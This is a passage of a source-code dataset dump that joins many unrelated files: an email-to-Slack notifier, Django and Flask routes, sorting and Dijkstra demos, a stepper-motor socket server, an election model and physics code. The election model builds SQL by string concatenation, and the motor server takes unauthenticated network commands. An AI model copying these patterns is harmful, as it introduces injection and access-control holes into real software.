imap.uid('search', None, 'All')\nall_email = data[0].split()\nlast_email = all_email[-5:] \n\nfor mail in reversed(last_email):\n result, data = imap.uid('fetch', mail, '(RFC822)')\n raw_email = data[0][1]\n email_message = email.message_from_bytes(raw_email, policy=policy.default) \n\n email_from = str(email_message['From'])\n email_date = str(email_message['Date'])\n subject, encode = find_encoding_info(email_message['Subject'])\n subject_str = str(subject)\n if subject_str.find(\"정산\") >= 0:\n slack_send_message = email_from + '\\n' + email_date + '\\n' + subject_str\n sendSlackWebhook(slack_send_message)\n 
print(slack_send_message)\n\nimap.close()\nimap.logout()","sub_path":"main16-3.py","file_name":"main16-3.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307232115","text":"\"\"\"archivo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf.urls import include, url\nfrom gam_app import views\nfrom django.contrib.flatpages import views as flat_views\nfrom dal import autocomplete\nfrom gam_app.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('registration.backends.hmac.urls')),\n path('i18n/', include('django.conf.urls.i18n')),\n]\n\nurlpatterns += i18n_patterns(\n path('', views.index, name='index'),\n path('buscar/', views.search, name='search'),\n path('cuentas/', include('django.contrib.auth.urls')),\n path('control-de-misión/', views.mission_control, name='mission_control'),\n path('persona/create/', PersonaCreate.as_view(), name='persona_create'),\n path('persona//update/', PersonaUpdate.as_view(), name='persona_update'),\n path('personalookup/', PersonaNameLookup.as_view(), name='persona_name_lookup'),\n path('lugar/create/', LugarCreate.as_view(), name='lugar_create'),\n path('lugar//update/', LugarUpdate.as_view(), name='lugar_update'),\n path('lugarlookup/', LugarNameLookup.as_view(), name='lugar_name_lookup'),\n path('organizacion/create/', OrganizacionCreate.as_view(), name='organizacion_create'),\n path('organizacion//update/', OrganizacionUpdate.as_view(), name='organizacion_update'),\n path('organizacionlookup/', OrganizacionNameLookup.as_view(), name='organizacion_name_lookup'),\n path('autocompletar_manuscrito/', autocompletar_manuscrito.as_view(), name='autocompletar_manuscrito'),\n path('necisita_transcripción', views.necisita_transcripción, name='necisita_transcripción'),\n path('crear_usuario/', include('registration.backends.simple.urls')),\n path('file/', views.document, name='document'),\n path('editar/', views.document_edit, name='document_edit'),\n path('dzi/', views.dzi, name='dzi'),\n path('caso/', views.caso, name='caso'),\n path('advanced_search_submit/', views.advanced_search_submit, name='advanced-search-submit'),\n path('sobre/', flat_views.flatpage, {'url': '/es/sobre/'}, name='sobre'),\n path('about/', flat_views.flatpage, {'url': '/en/about/'}, name='about'),\n path('documentos/', views.all_documents, name='all_documents'),\n path('portapapeles/', views.espacio_de_trabajo, name='espacio_de_trabajo'),\n path('portapapeles/', views.portapapeles, name='portapapeles'),\n path('texto/', views.todo_texto, name='all_texto'),\n path('explorar/', views.explorar, name='explorar'),\n path('caso/', views.single_caso, name='single_caso'),\n path('lugar/', views.lugar, name='lugar'),\n path('persona/', views.persona, name='persona'),\n 
path('procesamiento//////', views.procesamiento, name='procesamiento'),\n #paths for physical location urls\n path('//////', views.documento5, name='documento5'),\n path('/////', views.documento4, name='documento4'),\n path('////', views.documento3, name='documento3'),\n path('///', views.documento2, name='documento2'),\n path('//', views.documento1, name='documento1'),\n path('/', views.documento0, name='documento0'),\n)\n","sub_path":"archivo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101557381","text":"\n# This function takes last element as pivot, places\n# the pivot element at its correct position in sorted\n# array, and places all smaller (smaller than pivot)\n# to left of pivot and all greater elements to right\n# of pivot\n\n\ndef partition(arr,low,high):\n count=0\n i = ( low-1 ) # index of smaller element\n pivot = arr[high] # pivot\n print(\"pivot is: \",pivot)\n\n for j in range(low , high):\n # If current element is smaller than or\n # equal to pivot\n count+=1\n if arr[j] <= pivot:\n\n # increment index of smaller element\n i = i+1\n print(\"swap: \"+ str(i) +\" and \" + str(j))\n arr[i],arr[j] = arr[j],arr[i]\n print(arr[low:high+1])\n\n print(\"L swap: \" + str(high) +\" and \" + str(i+1))\n arr[i+1],arr[high] = arr[high],arr[i+1]\n print(\"count is: \", count)\n print(arr)\n return ( i+1 )\n\n# The main function that implements QuickSort\n# arr[] --> Array to be sorted,\n# low --> Starting index,\n# high --> Ending index\n\n# Function to do Quick sort\ndef quickSort(arr,low,high):\n if low < high:\n\n # pi is partitioning index, arr[p] is now\n # at right place\n pi = partition(arr,low,high)\n # Separately sort elements before\n # partition and after partition\n #quickSort(arr, low, pi-1)\n #quickSort(arr, pi+1, high)\n\n#arr = [1, 2, 3, 4, 5, 6, 7]\n#arr = [7, 6, 5, 4, 3, 2, 1]\n#arr = [2, 2, 2, 2, 2, 2, 2]\n#arr = [2,2,2]\narr= [1,4,7,2,8,6]\nprint(\"original arr: \",arr)\nn = len(arr)\nquickSort(arr,0,n-1)\n\nprint (\"Sorted array is: \", arr)\n","sub_path":"algo9.py","file_name":"algo9.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"15833199","text":"from flask import make_response, abort, request\nfrom . 
import web\nfrom config import config\nfrom directory_app.directory import directory\nimport auth\nimport json\n\t\t\n'''\n\tThe following functions handle routed web requests for Directory searches\n'''\t\n\n@web.route(config.directory_uri_path + '/details', methods = ['GET'])\n@auth.requires_auth(scope='general')\ndef details():\n\t'''\n\t\tVerify eligibility to vote in the ASPSU student elections\n\t'''\n\tglobal request\n\n\tperson_id = request.args.get('id')\n\tdirectory.log.info('details(): person_id: ' + str(person_id))\n\t\n\tdirectory.log.info('details(): called from remote address: ' + str(request.remote_addr) + ', for end point: ' + str(request.endpoint))\n\tuser = request.authorization.username\n\tstatus = directory.get_detail(person_id, user=user)\n\tif 'details' in status:\n\t\treturn(make_response(json.dumps(status), 200, {'Content-Type': 'application/json'}))\n\telse:\n\t\tabort(config.people_code_by_error[status['error']['type']], status)\n\n\n@web.route(config.directory_uri_path + '/search', methods = ['GET'])\n@auth.requires_auth(scope='general')\ndef search():\n\t'''\n\t\tVerify eligibility to vote in the ASPSU student elections\n\t'''\n\tglobal request\n\n\tquery = request.args.get('q')\n\tdirectory.log.info('search(): query: ' + str(query))\n\tdirectory.log.info('search(): query type: ' + str(type(query)))\n\tuser = request.authorization.username\n\tdirectory.log.info('search(): called from remote address: ' + str(request.remote_addr) + ', for end point: ' + str(request.endpoint))\n\tstatus = directory.search(query.split(), user=user)\n\tif 'directory' in status:\n\t\treturn(make_response(json.dumps(status), 200, {'Content-Type': 'application/json'}))\n\telse:\n\t\tabort(config.people_code_by_error[status['error']['type']], status)\n\n\n","sub_path":"courses_app/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"157269695","text":"load(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\n\nPLUGIN_VERSION = \"1.9.0\"\n\ndef java_proto_deps():\n existing = native.existing_rules()\n\n if \"protoc_gen_grpc_java_linux_x86_64\" not in existing:\n native.http_file(\n name = \"protoc_gen_grpc_java_linux_x86_64\",\n url = \"https://repo1.maven.org/maven2/io/grpc/protoc-gen-grpc-java/{plugin_version}/protoc-gen-grpc-java-{plugin_version}-linux-x86_64.exe\".format(\n plugin_version = PLUGIN_VERSION,\n ),\n sha256 = \"f20cc8c052eea904c5a979c140237696e3f187f35deac49cd70b16dc0635f463\",\n )\n\n if \"protoc_gen_grpc_java_linux_macosx\" not in existing:\n native.http_file(\n name = \"protoc_gen_grpc_java_linux_macosx\",\n url = \"https://repo1.maven.org/maven2/io/grpc/protoc-gen-grpc-java/{plugin_version}/protoc-gen-grpc-java-{plugin_version}-macosx.exe\".format(\n plugin_version = PLUGIN_VERSION,\n ),\n sha256 = \"593937361f99e8b145fe29c78c71cdd00e8327ae88de010729479eb2acdc1de9\",\n )\n\n if \"io_grpc_grpc_java\" not in existing:\n http_archive(\n name = \"io_grpc_grpc_java\",\n urls = [\"https://github.com/grpc/grpc-java/archive/v1.15.0.tar.gz\"],\n strip_prefix = \"grpc-java-1.15.0\",\n sha256 = \"8a131e773b1c9c0442e606b7fc85d7fc6739659281589d01bd917ceda218a1c7\",\n )\n","sub_path":"java/deps.bzl","file_name":"deps.bzl","file_ext":"bzl","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"633178869","text":"from selenium.common.exceptions import 
NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport math\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom locators import BasePageLocators\n\nclass BasketPage():\n\n def __init__(self, browser, url, timeout=10):\n self.browser = browser\n self.url = url\n self.browser.implicitly_wait(timeout)\n\n def open(self): \n self.browser.get(self.url)\n\n def is_element_present(self, how, what):\n try:\n self.browser.find_element(how, what)\n except (NoSuchElementException):\n return False\n return True\n\n def is_not_element_present(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException).\\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def go_to_basket_page(self):\n link = self.browser.find_element(*BasePageLocators.BASKET)\n link.click()\n\n def should_be_empty_basket(self):\n assert self.is_not_element_present(*BasePageLocators.EMPTY), \"Basket is not empty\"\n\n def should_be_empty_text(self):\n assert self.is_element_present(*BasePageLocators.TEXT_EMPTY), \"No text about empty basket\"","sub_path":"pages/basket_page.py","file_name":"basket_page.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"272744961","text":"from time import sleep\nimport pigpio\n\nDIR = 20 # Direction GPIO Pin\nSTEP = 21 # Step GPIO Pin\nWORK = 16\nSLEEP = 12\n\n# Connect to pigpiod daemon\npi = pigpio.pi()\n\n# Set up pins as an output\npi.set_mode(DIR, pigpio.OUTPUT)\npi.set_mode(STEP, pigpio.OUTPUT)\n\n# Set up input switch\npi.set_mode(WORK, pigpio.OUTPUT)\npi.write(WORK, 1)\n\nmodus = 0\n\n\nMODE = (14, 15, 18) # Microstep Resolution GPIO Pins\n\nRESOLUTION = {0: (0, 0, 0),\n 1: (1, 0, 0),\n 2: (0, 1, 0),\n 3: (1, 1, 0),\n 4: (0, 0, 1),\n 5: (1, 0, 1)}\n\n\nRESOLUTION = {0: (0, 0, 0),\n 1: (1, 0, 0),\n 2: (0, 1, 0),\n 3: (1, 1, 0),\n 4: (0, 1, 1),\n 5: (1, 1, 1)}\nfor i in range(3):\n pi.write(MODE[i], RESOLUTION[modus][i])\n\npi.write(DIR,1)\n\n### Set duty cycle and frequency\npi.set_PWM_dutycycle(STEP, 128) # PWM 1/2 On 1/2 Off\n###pi.set_PWM_frequency(STEP, 500) # 500 pulses per second\n\nimport socket # Import socket module\n\ns = socket.socket() # Create a socket object\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nhost = \"0.0.0.0\"#socket.gethostname() # Get local machine name\nport = 5000 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\ns.listen(1)\n\nsomeoneConnected = False\n\n\n\ntry:\n while True:\n while someoneConnected:\n data = conn.recv(1024)\n if data:\n data = data.decode(\"utf-8\") \n #print(\"no data\")\n data = data.split(\"\\n\",1)[0]\n if data == \"DISCONNECT\":\n conn.close()\n someoneConnected = False\n if data.startswith(\"speed:\"):\n speed = data[len(\"speed:\"):]\n speed = int(speed)\n if (speed):\n pi.set_PWM_frequency(STEP, speed*10)\n if data.startswith(\"status:\"):\n if data == \"status:drive\":\n pi.write(WORK,1)\n pi.write(SLEEP,1)\n if data == \"status:hold\":\n pi.write(WORK,0)\n pi.write(SLEEP,1)\n if data == \"status:sleep\":\n pi.write(WORK,0)\n 
pi.write(SLEEP,0)\n if data.startswith(\"Microstepping:\"):\n modus = data[len(\"Microstepping:\"):]\n print(\"Set Mode to:\")\n modus = int(modus)\n \n for i in range(3):\n pi.write(MODE[i], RESOLUTION[modus][i])\n \n \n \n \n print(data)\n print(\"keiner verbunden!\")\n conn, addr = s.accept()\n print('Got connection from', addr)\n someoneConnected = True\n\nexcept KeyboardInterrupt:\n print (\"\\nCtrl-C pressed. Stopping PIGPIO and exiting...\")\nfinally:\n pi.set_PWM_dutycycle(STEP, 0) # PWM off\n pi.write(WORK, 0)\n pi.stop()\n\n\n\n","sub_path":"slider_v2/slider_stepper_einer.py","file_name":"slider_stepper_einer.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"363665364","text":"def generator_new(generator):\n g = generator()\n result = None\n __pragma__(\"js\", \"{}\", \"\"\"\n function *makeIterator() {\n result = g.next();\n \"\"\")\n while not result.done:\n value = result.value\n __pragma__(\"js\", \"{}\", \"\"\"\n yield value;\n result = g.next();\n \"\"\")\n __pragma__(\"js\", \"{}\", \"\"\"\n }\n result = makeIterator();\n \"\"\")\n return result\n","sub_path":"src/tfchain/polyfill/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135539709","text":"def dijkstra(graph,src,dest,visited=[],distances={},predecessors={}):\n \"\"\" calculates a shortest path tree routed in src\n \"\"\" \n # a few sanity checks\n if src not in graph:\n raise TypeError('The root of the shortest path tree cannot be found')\n if dest not in graph:\n raise TypeError('The target of the shortest path cannot be found') \n # ending condition\n if src == dest:\n # We build the shortest path and display it\n path=[]\n pred=dest\n while pred != None:\n path.append(pred)\n pred=predecessors.get(pred,None)\n print('shortest path: '+str(path)+\" cost=\"+str(distances[dest])) \n else : \n # if it is the initial run, initializes the cost\n if not visited: \n distances[src]=0\n # visit the neighbors\n for neighbor in graph[src] :\n if neighbor not in visited:\n new_distance = distances[src] + graph[src][neighbor]\n if new_distance < distances.get(neighbor,float('inf')):\n distances[neighbor] = new_distance\n predecessors[neighbor] = src\n # mark as visited\n visited.append(src)\n # now that all neighbors have been visited: recurse \n # select the non visited node with lowest distance 'x'\n # run Dijskstra with src='x'\n unvisited={}\n for k in graph:\n if k not in visited:\n unvisited[k] = distances.get(k,float('inf')) \n x=min(unvisited, key=unvisited.get)\n dijkstra(graph,x,dest,visited,distances,predecessors)\n \n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n #unittest.main()\n graph = {'a1': {'b1': 1},\n 'a2': {'a1': 1},\n 'a3': {'b3': 1,'a2': 1},\n 'a4': {'b4': 1},\n 'b1': {'c1': 1},\n 'b2': {'a2': 1},\n 'b3': {'c3': 1},\n 'b4': {'a4': 1},\n 'c1': {'d1': 1, 'f1': 1},\n 'c2': {'b2': 1},\n 'c3': {'d3': 1, 'f3': 1},\n 'c4': {'b4': 1},\n 'd1': {'d2': 1, 'f1': 1},\n 'd2': {'d3': 1, 'f3': 1},\n 'd3': {'d4': 1},\n 'd4': {'c4': 1},\n 'e1': {'f1': 1},\n 'e2': {'e1': 1},\n 'e3': {'e2': 1, 'f3': 1, 'c2': 1},\n 'e4': {'e3': 1},\n 'f1': {'g1': 1},\n 'f2': {'d3': 1, 'c2': 1, 'e2': 1},\n 'f3': {'g3': 1},\n 'f4': {'e4': 1, 'c4': 1},\n 'g1': {'i1': 1},\n 'g2': {'f2': 1},\n 'g3': {'h2': 1, 'i3': 1},\n 'g4': {'f4': 1},\n 'h1': {'i4': 1},\n 'h2': {'h1': 1},\n 
'h3': {'h2': 1, 'i3': 1},\n 'h4': {'h3': 1},\n 'i1': {'j1': 1},\n 'i2': {'g2': 1, 'h2': 1},\n 'i3': {'j3': 1},\n 'i4': {'h4': 1, 'g4': 1},\n 'j1': {'k1': 1},\n 'j2': {'i2': 1},\n 'j3': {'k3': 1},\n 'j4': {'i4': 1},\n 'k1': {'k2': 1},\n 'k2': {'j2': 1, 'k3': 1},\n 'k3': {'k4': 1},\n 'k4': {'j4': 1}}\n \n \n dijkstra(graph,'a3','a1')\n","sub_path":"our_dijikstra.py","file_name":"our_dijikstra.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"278425400","text":"import matplotlib.pyplot as plt\n\nfrom helpers.strings import COLORS\n\n\nclass APUGraphic:\n def __init__(self, time_line):\n self.time_line = time_line\n plt.style.use('seaborn-bright')\n # plt.tight_layout()\n\n def create_graphic(self, graphic_name, args):\n fig, ax = plt.subplots(figsize=(10, 6))\n if len(args) == 4:\n ax.plot(self.time_line, args[0], color=COLORS[0], marker='*', label=args[2])\n ax.plot(self.time_line, args[1], color=COLORS[1], marker='o', label=args[3])\n else:\n ax.plot(self.time_line, args[0], color=COLORS[0], marker='*', label=args[3])\n ax.plot(self.time_line, args[1], color=COLORS[1], marker='o', label=args[4])\n ax.plot(self.time_line, args[2], color=COLORS[2], marker='|', label=args[5])\n ax.set_xlabel('Time')\n ax.set_ylabel('Data')\n ax.legend(loc='best')\n ax.tick_params(axis='x', which='minor', labelsize=3)\n plt.xticks(self.time_line, rotation=90)\n plt.show()\n fig.savefig(f'files/graphics/{graphic_name}.png', bbox_inches='tight')\n plt.close(fig)\n\n\n","sub_path":"graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"400847701","text":"import pypyodbc\r\nimport Constants\r\nfrom ContestantModel import ContestantModel\r\nfrom ElectionModel import ElectionModel\r\n\r\nfrom PoliticalPartyModel import PoliticalPartyModel\r\nfrom ConstituencyModel import ConstituencyModel\r\nclass ElectionNominationModel:\r\n def __init__(self, uniqueID=0, electionID=0, electionModel=None, contestantID=0, contestantModel = None, politicalPartyID=0, politicalPartyModel=None, constituencyID=0, constituencyModel=None):\r\n self.uniqueID = uniqueID\r\n self.electionID = electionID\r\n self.electionModel = electionModel\r\n self.contestantID = contestantID\r\n self.contestantModel = contestantModel\r\n self.politicalPartyID = politicalPartyID\r\n self.politicalPartyModel = politicalPartyModel\r\n \r\n self.constituencyID = constituencyID\r\n self.constituencyModel = constituencyModel\r\n \r\n \r\n @staticmethod\r\n def ElectionNominationgetElectionByID(rid):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"SELECT * FROM ContestantElectionDetails WHERE uniqueID = '\"+str(rid)+\"'\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n row = cur3.fetchone()\r\n electionNominationModel = None\r\n if row:\r\n contestantObject = ContestantModel.getContestantNameByID(row[1])\r\n politicalPartyObject = PoliticalPartyModel.getPoliticalPartyByID(row[2])\r\n electionObject = ElectionModel.getElectionNameByID(row[3])\r\n print(contestantObject.firstName)\r\n \r\n constituencyObject = ConstituencyModel.getConstituencyNameByID(row[4])\r\n \r\n electionNominationModel = ElectionNominationModel(row[0], electionID=row[1], electionModel=electionObject, contestantID= row[2], contestantModel = contestantObject, politicalPartyID=row[3], politicalPartyModel = 
politicalPartyObject, constituencyID = row[4], constituencyModel=constituencyObject)\r\n return electionNominationModel \r\n \r\n \r\n @staticmethod\r\n def getAllContestantByElectionByConstituency(electionID, constituencyID):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"\"\"SELECT ContestantMaster.contestantID, firstName FROM ContestantMaster \r\n INNER JOIN ContestantElectionDetails ON ContestantElectionDetails.contestantID = ContestantMaster.contestantID \r\n AND ContestantElectionDetails.electionID = '\"\"\"+str(electionID)+\"\"\"' \r\n AND ContestantElectionDetails.constituencyID = '\"\"\"+str(constituencyID)+\"\"\"'\"\"\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n \r\n contestantsList = []\r\n while True:\r\n row = cur3.fetchone()\r\n if not row:\r\n break\r\n contestantModel = ContestantModel(row[0], firstName=row[1])\r\n contestantsList.append(contestantModel)\r\n return contestantsList\r\n \r\n @staticmethod\r\n def getPoliticalPartyNameByElectionByConstituencyByContestantID(electionID, constituencyID, contestantID):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"\"\"SELECT politicalPartyName FROM ContestantElectionDetails \r\n INNER JOIN PoliticalPartyMaster ON PoliticalPartyMaster.PoliticalPartyID = ContestantElectionDetails.PoliticalPartyID \r\n AND ContestantElectionDetails.electionID = '\"\"\"+str(electionID)+\"\"\"' \r\n AND ContestantElectionDetails.constituencyID = '\"\"\"+str(constituencyID)+\"\"\"'\r\n AND ContestantElectionDetails.contestantID = '\"\"\"+str(contestantID)+\"\"\"'\"\"\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n \r\n politicalPatyName = \"\"\r\n row = cur3.fetchone()\r\n if row:\r\n politicalPatyName = row[0]\r\n return politicalPatyName ","sub_path":"project/2021/Evoting2019/src/ElectionNominationModel.py","file_name":"ElectionNominationModel.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"25381437","text":"from matplotlib.pyplot import *\nfrom PIL import ImageColor, Image\n\ninp = input().split(\" \")\nheight = int(inp[3])\nwidth = int(inp[4])\nim = Image.new(\"RGB\", (width, height))\n\nfor i in range(height):\n data = input().split(\" \")\n for j in range(width):\n cur = data[j]\n im.putpixel((j, i), ImageColor.getcolor(\"#\"+cur, 'RGB')) # Does the same thing\n\nfigure()\nimshow(im)\nshow() ","sub_path":"2task.py","file_name":"2task.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"432814658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport re\nimport nysol.util.margs as margs\nimport nysol.mcmd as nm\nimport nysol.view.mnetpie as nnpie\nimport nysol.util as nu\n\n\nhelpMSG=\"\"\"\nOverview) Creates an HTML page that draws a D3 graph from a node data file and an edge file\n\nUsage) #{$cmd} ni= ei= ef= nf= [nodeSizeFld=] [nodeColorFld=] [edgeWidthFld=] [edgeColorFld=] pieDataFld= pieTipsFld= picFld= o= -undirect\n\nCircles, pie charts, and images can be used as nodes\n\n\t\t\"\"\"\nif \"-help\" in sys.argv or \"--help\" in sys.argv:\n\tprint(helpMSG)\n\texit()\n\nkeylist=[\n\t[\"ei\",\"ni\",\"ef\",\"nf\",\"o\",\n\t\"nodeSizeFld\",\"pieDataFld\",\"pieTipsFld\",\n\t\"nodeTipsFld\",\"picFld\",\"nodeColorFld\",\n\t\"edgeWidthFld\",\"edgeColorFld\"],\n\t[\"undirect\",\"offline\"]\n]\nnparalist=[\n\t\"ei\",\"ni\",\"ef\",\"nf\",\"o\"\n]\n\nkwd = 
nu.margv2dict(sys.argv,keylist,nparalist)\nfooter = os.path.basename(sys.argv[0]) + \" \" + \" \".join(sys.argv[1:])\n\nnnpie.mnetpie(**kwd)\n\n\nnu.mmsg.endLog(footer)\n\n\n","sub_path":"scripts/mnetpie.py","file_name":"mnetpie.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"579934539","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\nimport os\r\n\r\n\r\nclass Categorical_Encoding():\r\n \r\n param_dict_Col = {}\r\n def __init__ (self, strategy, variables,Topn=None, Target_Var= None):\r\n self.strategy = strategy\r\n self.variables = variables\r\n self.Target_Var = Target_Var\r\n self.Topn = Topn\r\n \r\n def fit(self,df): \r\n if self.strategy =='OneHot':\r\n for i in self.variables:\r\n varList = df[i].unique()\r\n self.param_dict_Col[i]= varList[:self.Topn] \r\n \r\n if self.strategy == 'Ratio_Encoding':\r\n for i in self.variables: \r\n df[i].fillna('Missing',inplace=True)\r\n df['Prob_Target_1'] = df[self.Target_Var]\r\n prob_df = pd.DataFrame(df.groupby([i])['Prob_Target_1'].mean()) \r\n prob_df['Prob_Target_0'] = 1- prob_df.Prob_Target_1\r\n prob_df['Ratio'] = prob_df.Prob_Target_1/prob_df.Prob_Target_0 \r\n self.param_dict_Col[i]= prob_df['Ratio'].to_dict() \r\n \r\n if self.strategy == 'WOE_Encoding':\r\n for i in self.variables:\r\n df[i].fillna('Missing',inplace=True)\r\n per_df = pd.DataFrame(pd.crosstab(df[i], df[self.Target_Var], normalize='columns').mul(100))\r\n per_df.rename(columns={0: \"Target_0_Per\", 1: \"Target_1_Per\"},inplace=True)\r\n per_df['WOE'] = np.log(per_df['Target_1_Per']/per_df['Target_0_Per'])\r\n value = per_df['WOE'].to_dict() \r\n self.param_dict_Col[i]= value\r\n \r\n return self\r\n \r\n \r\n \r\n def transform(self,df):\r\n if self.strategy =='OneHot':\r\n for key,value in self.param_dict_Col.items():\r\n for a in value:\r\n column = key + \"_\" + a\r\n df[column] = np.where(df[key] == a,1,0) \r\n \r\n if self.strategy == 'Ratio_Encoding':\r\n for var in self.param_dict_Col:\r\n df[str(var) +\"_Encoded\"] = df[var].map(self.param_dict_Col[var] ) \r\n \r\n if self.strategy == 'WOE_Encoding':\r\n for var in self.param_dict_Col:\r\n df[str(var) +\"_WOE_Encoded\"] = df[var].map(self.param_dict_Col[var])\r\n \r\n return df \r\n \r\n","sub_path":"fast_ml/feature_engineering_categorical.py","file_name":"feature_engineering_categorical.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"404412496","text":"# -*- coding: utf-8 -*-\n\"\"\"\n The ``base`` module of modelphy library\n =========================\n \n Provides ...\n \n :Example:\n \n >>> import hades.aero.Isentropic as Is\n >>> Is.TiTs_Mach(1.)\n 1.2\n >>> Is.TiTs_Mach(2., gamma=1.6)\n 2.2\n \n Available functions\n -------------------\n \n Provides ...\n \"\"\"\n\nimport numpy as np\nimport math\nimport flowdyn.modelphy.base as mbase\n\n# ===============================================================\ndef _vecmag(qdata):\n return np.sqrt(np.sum(qdata**2, axis=0))\n\ndef _vecsqrmag(qdata):\n return np.sum(qdata**2, axis=0)\n\ndef _sca_mult_vec(r, v):\n return r*v # direct multiplication thanks to shape (:)*(2,:)\n\ndef _vec_dot_vec(v1, v2):\n return np.einsum('ij,ij->j', v1, v2) \n\ndef datavector(ux, uy, uz=None):\n return np.vstack([ux, uy]) if not uz else np.vstack([ux, uy, uz])\n\n# ===============================================================\n# implementation of MODEL 
class\n\nclass base(mbase.model):\n \"\"\"\n Class model for euler equations\n\n attributes:\n\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n mbase.model.__init__(self, name='euler', neq=3)\n self.islinear = 0\n self.shape = [1, 1, 1]\n self.gamma = gamma\n self.source = source\n \n def cons2prim(self, qdata): # qdata[ieq][cell] :\n \"\"\"\n >>> model().cons2prim([[5.], [10.], [20.]])\n True\n \"\"\"\n rho = qdata[0]\n u = qdata[1]/qdata[0]\n p = self.pressure(qdata)\n pdata = [ rho, u ,p ] \n return pdata \n\n def prim2cons(self, pdata): # qdata[ieq][cell] :\n \"\"\"\n >>> model().prim2cons([[2.], [4.], [10.]]) == [[2.], [8.], [41.]]\n True\n \"\"\"\n V2 = pdata[1]**2 if pdata[1].ndim==1 else _vecsqrmag(pdata[1])\n rhoe = pdata[2]/(self.gamma-1.) + .5*pdata[0]*V2\n return [ pdata[0], _sca_mult_vec(pdata[0], pdata[1]), rhoe ]\n\n def density(self, qdata):\n return qdata[0].copy()\n\n def pressure(self, qdata): # returns (gam-1)*( rho.et) - .5 * (rho.u)**2 / rho )\n return (self.gamma-1.0)*(qdata[2]-self.kinetic_energy(qdata))\n\n def velocity(self, qdata): # returns (rho u)/rho, works for both scalar and vector\n return qdata[1]/qdata[0]\n\n def velocitymag(self, qdata): # returns mag(rho u)/rho, depending if scalar or vector\n return np.abs(qdata[1])/qdata[0] if qdata[1].ndim==1 else _vecmag(qdata[1])/qdata[0]\n\n def kinetic_energy(self, qdata): \n \"\"\"volumic kinetic energy\"\"\"\n return .5*qdata[1]**2/qdata[0] if qdata[1].ndim==1 else .5*_vecsqrmag(qdata[1])/qdata[0]\n\n def mach(self, qdata):\n return qdata[1]/np.sqrt(self.gamma*((self.gamma-1.0)*(qdata[0]*qdata[2]-0.5*qdata[1]**2)))\n\n def entropy(self, qdata): # S/r\n return np.log(self.pressure(qdata)/qdata[0]**self.gamma)/(self.gamma-1.)\n\n def enthalpy(self, qdata): \n return 